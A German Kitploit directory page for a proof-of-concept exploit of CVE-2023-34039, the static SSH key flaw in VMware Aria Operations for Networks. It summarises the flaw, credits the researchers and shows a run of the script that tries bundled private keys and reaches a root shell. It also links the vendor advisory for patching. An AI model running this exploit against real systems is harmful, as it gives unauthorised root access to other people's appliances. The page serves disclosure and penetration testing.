Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-34039 — CVE-2023-34039 | Kitploit
Tools/GitHubGitHub/syedhafiz1234/cve-2023-34039
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsCloud-SicherheitRemote-Access-Tool
GitHubsyedhafiz1234/cve-2023-34039

CVE-2023-34039

CVE-2023-34039

Repository anzeigen
11vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-34039

POC für CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE

Technische Analyse

Eine Root-Cause-Analyse der Schwachstelle finden Sie auf meinem Blog:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

poc

Zusammenfassung

VMWare Aria Operations for Networks (vRealize Network Insight) hat von Version 6.0 bis 6.10 die SSH-Schlüssel für die Benutzer support und ubuntu nicht neu generiert, wodurch ein Angreifer mit SSH-Zugriff root-Shell-Zugriff auf dieses Produkt erlangen konnte.

Dieses Problem wurde VMWare von Harsh Jaiswal (@rootxharsh) und Rahul Maini (@iamnoooob) bei ProjectDiscovery Research gemeldet.

Ich habe nur den Exploit geschrieben, wenn man das so nennen kann, denn es ist im Grunde ein Wrapper für SSH-Befehle.

Verwendung

root@kitploit:~
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

Gegenmaßnahmen

Aktualisieren Sie auf die neueste Version oder entschärfen Sie das Problem, indem Sie den Anweisungen im Progress Advisory folgen.

  • https://www.vmware.com/security/advisories/VMSA-2023-0018.html
Tool herunterladen